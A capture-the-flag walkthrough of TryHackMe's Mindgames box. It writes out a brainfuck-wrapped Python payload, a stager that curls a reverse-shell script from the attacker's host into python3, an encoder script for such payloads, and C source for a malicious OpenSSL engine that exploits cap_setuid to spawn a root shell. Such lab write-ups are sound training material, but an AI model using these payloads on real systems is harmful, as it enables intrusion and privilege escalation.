MindGames Walkthrough TryHackMe
Hello guys, back again with another walkthrough. This time I'll be tackling Mindgames from TryHackMe. The box was a really funny and nice one when it comes to the initial foothold, since the payload had to be turned into a brainfuck program for it to work. Brainfuck is an esoteric programming language rather than a cipher, but the box treats it like an encoding: the web application runs the brainfuck you submit and executes whatever that program prints as Python code. Once you know this you make the web application download a reverse shell and execute it to get a shell on the box. User done!! For root it's a little bit hidden, and if you don't do your enumeration well you might miss it: the OpenSSL binary has the cap_setuid capability set, and we load a malicious engine into it that basically gives us root on the box. It's a really fun box and thanks to the creator of the box, ninjaJC01. This is the second box of his that I've done, and in both of them you have to exploit capabilities to get root. Without much say, let's jump in.
As always we'll start off with an nmap scan to learn which services are running on the box.
We find two open ports, 22 and 80. SSH requires authentication, which we don't have, and HTTP is serving a website called Mindgames. There are two things we can do from here:
- Bruteforce secure-shell (SSH)
- Enumerate HTTP
I opted against bruteforcing SSH, since we don't even have a valid username, and decided to enumerate HTTP.
On opening the webpage we get a standard-looking site.
What stood out to me was that the strings of symbols are brainfuck programs (I've had some experience with them before, which is why I recognized them in an instant). We'll get to that in a little while, but first I decided to check whether common files like robots.txt existed on the web server.
I wasn't so lucky. So I decided to run gobuster, a tool used to brute-force URIs (directories and files) as well as DNS subdomains, while I enumerated the web application manually.
While gobuster was running I decided to decode the brainfuck on the homepage of the web application using an online tool (I'll leave a link in the description).
The first program, once decoded, is Python code that just prints hello, world.
The second program, once decoded, just does arithmetic operations and prints the result.
Looking at the bottom of the homepage we get something interesting which tells us that we can enter a code and the web application will run it
Since the decoded programs were Python, why don't we try submitting some Python code and see how it behaves?
I entered a simple print statement that should show its text in the output.
But when I clicked "Run it!" I got no result back. This got me thinking: what if the Python code needs to be wrapped in brainfuck, like the rest of the programs we found on the homepage, for it to work?
Since the decoding website also supports encoding text into a brainfuck program, I used it to encode the Python code.
I copied the encoded string to my clipboard, pasted it into the homepage again and ran the code.
And voila, as you see above, our code got executed. Knowing that we can execute Python code, why don't we turn it into remote code execution using the Python one-liner below? It imports the os module, which lets us execute system commands on the target:
__import__("os").system("ls -la")
But remember, the payload needs to be encoded first.
On running the encoded payload against the target box we get command execution.
Now let's turn command execution into a reverse shell on the box.
First I intercepted the request using Burp Suite, since it makes my job way easier.
1. I created a Python reverse shell one-liner and saved it on my box in a script called rev.py.
2. I started a netcat listener on my local box.
3. I hosted the Python script with an HTTP server on my box, then had the target curl the script and pipe the output into python3:
__import__("os").system("curl 10.8.*.*:8000/rev.py | python3")
Change the IP address to your own, then encode the payload into brainfuck.
After sending the encoded payload with Burp Suite I got no response in Burp.
But looking back at the terminal where I had set up the netcat listener, I had a shell on my local box. Sweet!!!!!
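Both the encoding step above and the curl stager in step 3 come down to the same trick: produce a brainfuck program whose output is the Python source, because the site runs the brainfuck and executes what it prints. The following script is an added example (it is not the site's encoder or the online tool the walkthrough used) that generates such a program and verifies it with a small brainfuck interpreter before handing it over. The attacker address 10.8.0.1 is a placeholder assumption; replace it with your VPN IP.

```python
"""Wrap a Python payload in a brainfuck program that prints it, and verify the
round trip with a small brainfuck interpreter. Added example for the Mindgames
walkthrough; not the site's own encoder."""


def text_to_brainfuck(text: str) -> str:
    """Return a brainfuck program whose output is exactly `text`.

    Uses a single cell: adjust it to the next byte with +/- and print it.
    Not the shortest possible program, but correct for any byte string.
    """
    program = []
    current = 0
    for byte in text.encode():
        delta = byte - current
        program.append("+" * delta if delta >= 0 else "-" * -delta)
        program.append(".")
        current = byte
    return "".join(program)


def run_brainfuck(program: str, stdin: bytes = b"") -> str:
    """Interpret `program` (8-bit wrapping cells, 30000-cell tape); return its output."""
    # Pre-compute matching brackets so loop jumps are O(1).
    jumps, stack = {}, []
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced brackets")
    tape = bytearray(30000)
    ptr = pc = inp = 0
    out = bytearray()
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = stdin[inp] if inp < len(stdin) else 0
            inp += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    return out.decode("utf-8", errors="replace")


def encode_payload(python_source: str) -> str:
    """Encode a Python payload, checking that the brainfuck really prints it."""
    bf = text_to_brainfuck(python_source)
    if run_brainfuck(bf) != python_source:
        raise RuntimeError("encoder self-check failed")
    return bf


# Stage 1 of the walkthrough: prove command execution.
LS_PAYLOAD = '__import__("os").system("ls -la")'
# Stage 2: fetch rev.py from the attacker box and feed it to python3.
# ATTACKER is a placeholder (assumption); use your own VPN address.
ATTACKER = "10.8.0.1"
STAGER = f'__import__("os").system("curl {ATTACKER}:8000/rev.py | python3")'

if __name__ == "__main__":
    for payload in (LS_PAYLOAD, STAGER):
        bf = encode_payload(payload)
        print(f"{len(payload)} bytes of Python -> {len(bf)} bytes of brainfuck")
        print(bf)
```

Paste the printed program into the "Run it!" box (or into the intercepted request body in Burp); the interpreter check in `encode_payload` is what stops you from chasing a broken encoding when nothing comes back.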
Looking in the mindgames user's home directory we have the user flag.
The next logical thing to do is run linpeas, the Linux Privilege Escalation Awesome Script, which automatically checks for privilege escalation vectors and prints the results in really awesome colours.
So I downloaded linpeas onto the box and ran it, and found that the OpenSSL binary has the cap_setuid capability set, which lets it change its own UID (you can confirm this by hand with getcap -r / 2>/dev/null).
Because openssl can load shared libraries (engines), that capability lets us run our own code inside the openssl process and call setuid(0) from there.
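linpeas flags this for you, but it helps to know what you are looking for in raw getcap output, which is how you find it on a box where you can't drop linpeas. The script below is an added example, not part of linpeas or the original post: it parses the output of getcap -r / (both the older "path = caps" and the newer "path caps" formats) and reports capabilities that let a binary escalate by itself. The sample output is constructed for the example.

```python
"""Triage `getcap -r / 2>/dev/null` output for capabilities that let a binary
escalate on its own. Added example; the sample output below is constructed."""

import re

# Capabilities that hand a binary direct control over its privileges or the
# file system. Any of these on an executable deserves a close look.
DANGEROUS = {
    "cap_setuid": "can setuid(0): run code as root (this box's openssl)",
    "cap_setgid": "can setgid(0): become any group",
    "cap_dac_override": "bypasses file read/write/execute permission checks",
    "cap_dac_read_search": "bypasses file read checks (read /etc/shadow)",
    "cap_sys_admin": "mount, namespaces and much more; effectively root",
    "cap_sys_ptrace": "can attach to and inject into root processes",
    "cap_chown": "can chown any file",
    "cap_fowner": "ignores file-owner checks (chmod any file)",
    "cap_sys_module": "can load kernel modules",
}

GROUP_RE = re.compile(r"([a-z0-9_,]+)([=+\-])([eip]*)")


def parse_getcap(output: str):
    """Yield (path, capability, flags) from old- and new-style getcap lines."""
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        # old libcap: "/path = caps"; newer libcap: "/path caps"
        if " = " in line:
            path, _, caps = line.partition(" = ")
        else:
            path, _, caps = line.partition(" ")
        for group in caps.split():
            m = GROUP_RE.fullmatch(group)
            if not m:
                continue
            names, op, flags = m.groups()
            if op == "-":  # this group removes capabilities; nothing granted
                continue
            for name in names.split(","):
                yield path, name, flags


def triage(output: str) -> list:
    """Return (path, capability, why) for each dangerous capability found."""
    hits = []
    for path, cap, flags in parse_getcap(output):
        if cap not in DANGEROUS:
            continue
        why = DANGEROUS[cap]
        if "e" not in flags:
            # Permitted but not effective: the program must raise it itself,
            # so it only helps if you control the code it runs.
            why += " (permitted only; must raise it itself)"
        hits.append((path, cap, why))
    return hits


# Constructed sample output, mixing both getcap formats.
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 cap_dac_read_search=p
"""

if __name__ == "__main__":
    for path, cap, why in triage(SAMPLE):
        print(f"{path}: {cap} -> {why}")
```

Run it as `getcap -r / 2>/dev/null | python3 triage.py` after swapping `SAMPLE` for `sys.stdin.read()`; on this box the openssl line is the one that matters.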
So I wrote a minimal OpenSSL engine which, when openssl loads it, switches to UID 0 and spawns bash as root:
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>
#include <sys/types.h>
#include <openssl/engine.h>

/* openssl calls bind() when it dynamically loads this .so as an engine.
 * The binary carries cap_setuid, so setuid(0) succeeds and the bash we
 * spawn inherits UID 0. setgid(0) needs CAP_SETGID, which the binary does
 * not have; it simply fails and is harmless. */
static int bind(ENGINE *e, const char *id)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
Then I compiled the engine with the command below, which produces a shared object (root.so) rather than a standalone executable:
gcc -fPIC -o root.o -c root.c && gcc -shared -o root.so -lcrypto root.o
If gcc fails because the OpenSSL headers (openssl/engine.h) cannot be found, install the libssl-dev package with the command below:
sudo apt-get install libssl-dev
Then compile again and you'll get the shared object as seen below.
Now I uploaded the shared object to the target system and loaded it into openssl with the command below:
openssl engine -t -c `pwd`/root.so
And voila, I had a root shell on the box.
Now it’s time to submit the root flag and earn our points
That’s it for now guys till next time take care folks. If you liked the walkthrough you can clap for me down below